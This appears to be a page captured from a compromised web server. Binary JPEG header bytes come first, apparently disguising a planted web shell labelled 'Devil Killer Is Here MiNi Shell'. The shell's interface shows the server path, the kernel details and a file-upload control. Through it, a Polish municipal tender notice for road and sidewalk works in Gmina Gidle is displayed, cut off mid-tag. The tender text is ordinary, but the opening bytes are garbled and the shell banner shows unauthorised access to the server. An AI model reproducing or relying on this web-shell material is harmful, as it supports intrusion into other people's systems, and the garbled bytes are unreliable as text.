JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220301/0007157401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa, remont dróg oraz budowa chodników na terenie Gminy Gidle </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GIDLE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398675</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Pławińska 22</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gidle</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-540</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">34/327-20-27</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zampubliczne@gidle.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.gidle.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa, remont dróg oraz budowa chodników na terenie Gminy Gidle </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-99330177-9951-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00071574</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00029297/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Przebudowa, remont dróg oraz budowa chodników na terenie Gminy Gidle</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.gidle.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej na stronie: https://miniportal.uzp.gov.pl/<br/>Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, Zamawiający zaleca przygotowanie oferty w formacie .pdf<br/>Zamawiający zaleca do kompresji dokumentów elektronicznych format danych.zip lub .7Z.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP<br/>W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym,a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27.04.2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, zwane dalej RODO) (Dz.U. UE. L. Nr 119, s.1) informujemy, że:<br/>Administratorem Pani/Pana danych osobowych jest Gmina Gidle z siedzibą w Urzędzie Gminy Gidle: 97-540 Gidle, ul. Pławińska 22, tel. 34 327 20 27, e-mail: ug@gidle.pl, reprezentowana przez Wójta Gminy Gidle. <br/>Administrator wyznaczył inspektora ochrony danych, z którym może się Pani/Pan kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych: pisemnie na adres naszej siedziby lub poprzez pocztę elektroniczną: iod@gidle.pl <br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego /dane identyfikujące postępowanie, np. nazwa, numer/ prowadzonym w trybie podstawowym pn.: Przebudowa, remont dróg oraz budowa chodników na terenie Gminy Gidle” Znak sprawy: IZP.271.3.2022<br/>Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy z dnia 11 września 2019r. – Prawo zamówień publicznych (Dz.U. 2021 poz. 1129 ze zm.), dalej „ustawa Pzp”, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. <br/>Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp; <br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp. Pozostałe informacji dot. RODO zostały zawarte w Rozdziale I SWZ. pkt. 22 IDW.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP.271.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 2906682,44 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja inwestycji pn. „Przebudowa, remont dróg oraz budowa chodników na terenie Gminy Gidle” w ramach ww. przedmiotu zamówienia należy wykonać VII zadań:<br/>I.	Remont drogi gminnej Nr 112054E w miejscowości Strzała – działka ewidencyjna nr 219, 232 Obr. Strzała<br/>Zakres robót:<br/>1.	Wykonanie nawierzchni bitumicznej jezdni na odcinku o długości 1625 mb, szerokość jezdni 3,0 – 4,0 m.<br/>2.	Wyprofilowanie i dogęszczenie istniejącej nawierzchni tłuczniowej jezdni.<br/>3.	Konstrukcja jezdni:-warstwa ścieralna z betonu asfaltowego AC11S - 4 cm;- warstwa wiążąca z betonu asfaltowego AC16W - 5 cm; - podbudowa z kruszywa łamanego 0/31,5 mm - 15 cm<br/>4.	Przed wykonaniem warstwy ścieralnej należy oczyścić nawierzchnię i skropić ją kationową emulsją bitumiczną.<br/>5.	Odwodnienie i wykonanie poboczy z destruktu bitumicznego o szerokości 0,50m i grubości 10cm. <br/>6.	Uporządkowanie terenu prowadzonych robót. <br/>II.	Przebudowa drogi wewnętrznej w miejscowości Strzała – działka ewidencyjna nr 150 Obr. Zagórze<br/>Zakres robót: Przebudowa drogi wewnętrznej w miejscowości Strzała na długości 600 mb.<br/>1.	Wykonanie nawierzchni bitumicznej jezdni na odcinku o długości 600 mb, szerokość jezdni 3,5 m.<br/>2.	Wyprofilowanie i dogęszczenie istniejącej nawierzchni tłuczniowej jezdni.<br/>3.	Konstrukcja jezdni:-warstwa ścieralna z betonu asfaltowego AC11S - 4 cm; - warstwa wiążąca z betonu asfaltowego AC16W- 5 cm; - podbudowa z kruszywa łamanego 0/31,5 mm - 10 cm<br/>4.	Przed wykonaniem warstwy ścieralnej należy oczyścić nawierzchnię i skropić ją kationową emulsją bitumiczną.<br/>5.	Utwardzenie poboczy destruktem asfaltowym o szerokości 0,75m i grubości 10cm. Pobocza należy wykonać ze spadkiem 6% w kierunku przyległego terenu.<br/>7.	Uporządkowanie terenu prowadzonych robót. <br/>III.	Przebudowa drogi dojazdowej w miejscowości Gowarzów – działka ewidencyjna nr 138 Obr. Gowarzów <br/>Zakres robót: Przebudowa drogi dojazdowej w miejscowości Gowarzów na długości 178 mb, w zakresie nowej konstrukcji jezdni oraz budowy chodnika. Na odcinku od km 0+000.00 do 0+140.00 należy wykonać nową konstrukcję jezdni o szerokości 4,0m.<br/>1.	Wykonanie nawierzchni bitumicznej jezdni na odcinku o długości 178 mb, szerokość jezdni 4,0 m.<br/>2.	Wyprofilowanie nawierzchni jezdni.<br/>3.	Konstrukcja jezdni na poszerzeniu:- warstwa ścieralna z betonu asfaltowego AC11S - 4 cm; - warstwa wiążąca z betonu asfaltowego AC16W - 5 cm; - podbudowa z kruszywa łamanego 0/31,5 mm - 20 cm; - warstwa odsączająca z pospółki- 10 cm<br/>4.	Przed wykonaniem warstwy ścieralnej należy oczyścić nawierzchnię i skropić ją kationową emulsją bitumiczną.<br/>5.	Nawierzchnię należy wykonać ze spadkiem prawostronnym 2%.<br/>6.	Wykonanie prawostronne poboczy - utwardzenie pobocza kruszywem łamanym 0/31,5mm, o szerokości 0,75m i grubość 10cm. <br/>7.	Wykonanie chodnika po stronie północnej (lewostronny) o szerokości 2,0m.<br/>a)	Nawierzchnię należy wykonać ze spadkiem 1% w kierunku jezdni.<br/>b)	Konstrukcja chodnika: - kostka brukowa betonowa – kolor szary - 6 cm;- podsypka cementowo-piaskowa 1:4 - 4 cm; - warstwa odsączająca z pospółki - 15 cm; - obramowanie chodnika od strony jezdni krawężnikiem betonowym 15x30cm na ławie betonowej z oporem betonu C12/15<br/>- krawędzie boczne należy ograniczyć obrzeżami betonowymi 8x30 cm na ławie betonowej z oporem z betonu C12/15.<br/>c)	Konstrukcja zjazdów:- wykonanie w bramach chodnika o wzmocnionej podbudowie (zjazdów), wg. planu sytuacyjnego; - kostka brukowa betonowa – kolor czerwony - 8 cm;- podsypka cementowo-piaskowa 1:4 - 4 cm; -podbudowa z kruszywa łamanego 0/31,5 mm - 15 cm; - warstwa odsączająca z pospółki - 10 cm; - obramowanie od strony jezdni krawężnikiem betonowym 15x22 cm na ławie betonowej z oporem z betonu C12/15; -krawędzie boczna należy ograniczyć obrzeżami betonowymi 8x30cm na ławie betonowej z oporem z betonu C12/15.<br/>8.	Uporządkowanie terenu prowadzonych robót. <br/>IV.	Przebudowa drogi gminnej Nr 112053E w miejscowości Ludwików- działka ewidencyjna nr 80 Obr. Ludwików.<br/>Zakres robót: Przebudowa nawierzchni drogi gminnej w miejscowości Ludwików na długości 493 mb.<br/>1.	Wykonanie nawierzchni bitumicznej jezdni na odcinku o długości 493 mb, szerokość jezdni 3,5 m.<br/>2.	Wyprofilowanie i dogęszczenie istniejącej nawierzchni tłuczniowej jezdni. <br/>3.	Przed wykonaniem warstwy ścieralnej należy oczyścić nawierzchnię i skropić ją kationową emulsją bitumiczną.<br/>4.	Konstrukcja jezdni na poszerzeniu:- warstwa ścieralna z betonu asfaltowego AC11S - 4 cm;- warstwa wiążąca z betonu asfaltowego AC16W - 5 cm; - podbudowa z kruszywa łamanego 0/31,5 mm - 10 cm; - destrukt asfaltowy - 10 cm<br/>5.	Nawierzchnię należy wykonać ze spadkiem daszkowym 2%.<br/>6.	Wykonanie poboczy - utwardzenie pobocza kruszywem łamanym 0/31,5mm, o szerokości 0,75m i grubość 10cm. Pobocza należy wykonać ze spadkiem 6% w kierunku przyległego terenu.<br/>7.	Uporządkowanie terenu prowadzonych robót. <br/>V.	Przebudowa drogi gminnej Nr 112058E w miejscowości Kotfin – działki ewidencyjne nr 578,657 Obr. Kotfin<br/>Zakres robót: Przebudowa nawierzchni drogi gminnej w miejscowości Kotfin na długości 554 mb.<br/>1.	Wykonanie nawierzchni bitumicznej jezdni na odcinku o długości 554 mb, szerokość jezdni 3,5 m.<br/>2.	Wyprofilowanie, poszerzenie i dogęszczenie istniejącej nawierzchni tłuczniowej jezdni. <br/>3.	Na łuku należy wykonać poszerzenie jezdni do 5,0 m w celu umożliwienia mijania pojazdów. <br/>4.	Przed wykonaniem warstwy ścieralnej należy oczyścić nawierzchnię i skropić ją kationową emulsją bitumiczną.<br/>5.	Konstrukcja jezdni na poszerzeniu: - warstwa ścieralna z betonu asfaltowego AC11S - 5 cm; - podbudowa z kruszywa łamanego 0/31,5 mm - 20 cm; - warstwa odcinająca z piasku - 10 cm<br/>6.	Nawierzchnię jezdni należy wykonać ze spadkiem lewostronnym 2%.<br/>7.	Wykonanie obustronne poboczy - utwardzenie poboczy kruszywem łamanym 0/31,5mm, o szerokości 0,75m i grubość 10cm. Pobocza należy wykonać ze spadkiem 8% w kierunku przyległego terenu.<br/>8.	Uporządkowanie terenu prowadzonych robót. <br/>VI.	Przebudowa drogi gminnej Nr 112070E w miejscowości Ciężkowice – działki nr 724, 981/1, 1004 Obr. Ciężkowice<br/>Zakres robót: Przebudowa nawierzchni drogi gminnej w miejscowości Kotfin na długości 652,3 mb.<br/>1.	Wykonanie nawierzchni bitumicznej jezdni na odcinku o długości 652,3 mb, szerokość jezdni 3,5 m.<br/>2.	Wyprofilowanie i dogęszczenie istniejącej nawierzchni z kruszywa łamanego <br/>3.	Przed wykonaniem warstwy ścieralnej należy oczyścić nawierzchnię i skropić ją kationową emulsją bitumiczną.<br/>4.	Konstrukcja jezdni na poszerzeniu:- warstwa ścieralna z betonu asfaltowego AC11S - 4 cm; - warstwa wiążąca z betonu asfaltowego AC16W - 5 cm; - podbudowa z kruszywa łamanego 0/31,5 mm -15 cm<br/>5.	Nawierzchnię jezdni należy wykonać ze spadkiem daszkowym 2%.<br/>6.	Wykonanie obustronne poboczy - utwardzenie poboczy kruszywem łamanym 0/31,5mm, o szerokości 0,75m i grubość 10cm. Pobocza należy wykonać ze spadkiem 8% w kierunku przyległego terenu.<br/>7.	Wymiana istniejącego przepustu pod drogą. W ramach wymiany należy:<br/>- rozebrać i ułożyć nowy przepust z rur betonowych ᵠ500 i długości 10m. <br/>- spadek podłużny przepustu dostosować do istniejących rzędnych rowu przydrożnego. <br/>- przepust należy posadowić na ławie żwirowej grubości 10 cm. <br/>- na wlocie i wylocie przepustu należy zamontować prefabrykowane ścianki czołowe.<br/>8.	Uporządkowanie terenu prowadzonych robót. <br/>VII.	Przebudowa drogi gminnej Nr 112061E w miejscowości Wojnowice poprzez wykonanie chodnika na długości od posesji nr ewidencyjny 48 do posesji nr 76 (działka ewidencyjna nr 380 Obr. Wojnowice)<br/>Zakres robót: Wykonanie chodnika prawostronnego o długości 1040 mb. wraz ze zjazdami indywidualnymi do posesji prywatnych występujących wzdłuż chodnika.<br/>1.	Wykonanie chodnika jednostronnego o szerokości 1,5m wg. planu sytuacyjnego.<br/>2.	Wykonanie chodnika po stronie północnej (lewostronny) o szerokości 2,0m.<br/>3.	Konstrukcja chodnika: <br/>- kostka brukowa betonowa – kolor szary - 6 cm<br/>- podsypka cementowo-piaskowa - 4 cm<br/>- podbudowa z kruszywa łamanego 0/31,5mm - 10 cm<br/>- warstwa odsączająca z pospółki - 10 cm<br/>- obramowanie chodnika od strony jezdni krawężnikiem betonowym 15x30cm na ławie betonowej z oporem betonu C12/15, a od strony ogrodzeń obrzeżem betonowym 30x6cm na ławie betonowej z oporem z betonu C12/15,<br/>- nawierzchnię chodników należy wykonać z jednostronnym spadkiem poprzecznym 1% w kierunku jezdni,<br/>- krawężnik będzie wystawał 12 cm ponad krawędź jezdni, <br/>- przy zjazdach oraz przejściu dla pieszych należy obniżyć krawężnik do 4 cm ponad nawierzchnię jezdni (krawężnik najazdowy 15x22)<br/>4.	Konstrukcja zjazdów:- wykonanie w bramach chodnika o wzmocnionej podbudowie wg. planu sytuacyjnego; - kostka brukowa betonowa – kolor czerwony - 8 cm; - podsypka cementowo-piaskowa 1:4 - 4 cm; - podbudowa z kruszywa łamanego 0/31,5 mm - 15 cm; - warstwa odsączająca z pospółki - 10 cm; <br/>- obramowanie od strony jezdni krawężnikiem betonowym 15x22 cm na ławie betonowej z oporem z betonu C12/15.<br/>-krawędzie boczna należy ograniczyć obrzeżami betonowymi 30x8cm na ławie betonowej z oporem z betonu C12/15.<br/>- krawężnik powinien wystawać 4cm ponad nawierzchnię jezdni,<br/>- obniżenie wysokości krawężnika pomiędzy chodnikiem a zjazdem należy wykonać poza skosem najazdowym i zjazdem. <br/>5.	Uporządkowanie terenu prowadzonych robót. <br/>Wykonawca zobowiązany jest ponadto do zapewnienia obsługi geodezyjnej inwestycji w celu wytyczenia robót i sporządzenia operatów geodezyjnych powykonawczych. <br/>Wykonawca zobowiązany jest sporządzić dokumentację odbiorową w dwóch egzemplarzach w języku polskim.<br/>Szczegółowy opis przedmiotu zamówienia i zakres robót ujęty został w dokumentacji projektowej, przedmiarach oraz w specyfikacji technicznej wykonania i odbioru robót. WW. dokumenty stanowią załącznik do SWZ (Rozdział V). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233100-0 - Roboty w zakresie budowy autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował następującymi kryteriami: cena oferty (C) – 100% <br/>Sposób oceny ofert: w kryterium „cena oferty” w którym zamawiającemu zależy, aby wykonawca przedstawił jak najniższą wartość (cena), zostanie zastosowany następujący wzór: Liczba zdobytych punktów (C) = Cn/Cb x 100 x waga kryterium 100% Gdzie: Cn – cena najniższa wśród ofert nie odrzuconych, Cb – cena oferty badanej, 100 – wskaźnik stały, 100 – procentowe znaczenie kryterium ceny.<br/>Liczba punktów, którą można uzyskać w ramach kryterium cena obliczona zostanie przez podzielenie ceny najniższej z ofert przez cenę ocenianej oferty i pomnożenie tak otrzymanej liczby przez 100 punktów i wagę kryterium, którą ustalono na 100%. <br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów w kryterium &#34;cena oferty&#34;.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span 